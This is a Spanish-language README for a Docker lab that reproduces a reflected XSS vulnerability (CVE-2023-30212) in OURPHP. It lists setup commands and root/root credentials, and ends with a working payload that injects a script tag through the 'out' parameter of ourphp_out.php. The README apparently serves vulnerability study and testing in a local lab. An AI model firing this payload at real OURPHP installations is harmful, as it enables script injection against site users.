
Esto contiene los archivos necesarios y Docker para replicar una vulnerabilidad en OURPHP que tiene una vulnerabilidad XSS (CVE-2023-30212)
Esto contiene los directorios necesarios y el Dockerfile para replicar una vulnerabilidad en OURPHP que tiene una vulnerabilidad XSS (CVE-2023-30212).
PRE-REQUISITOS
Descargar Docker
sudo apt install -y docker.io
Descargue los archivos de este repositorio usando git clone
git clone https://github.com/VisDev23/Vulnerable-Docker--CVE-2023-30212-.git .
Esto contiene los directorios necesarios y el dockerfile para replicar el escenario.
Después de descargar los archivos, construya una imagen docker usando
sudo docker build -t <Give_Suitable_Docker_name> . .
! Agregue un nombre a la imagen Docker para poder llamarla más tarde.
Convierta la imagen Docker en un contenedor usando
sudo docker run -d -p 80:80 <Docker_Image_Name> .
! Aquí el puerto del contenedor se mapea al puerto 80.
Para ver el estado del contenedor docker,
sudo docker ps
Después de realizar estos pasos,
Ingrese a localhost y configure OURPHP con las siguientes credenciales. Usuario : root Contraseña : root Nombre de la base de datos: data
Ahora debe configurar el usuario y la contraseña para la administración. Establezca lo siguiente: Usuario: root Contraseña: root y continuar
Entonces nuestro payload es
/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("xss")</script>
agregue esto junto con localhost o 127.0.0.1 para activar XSS.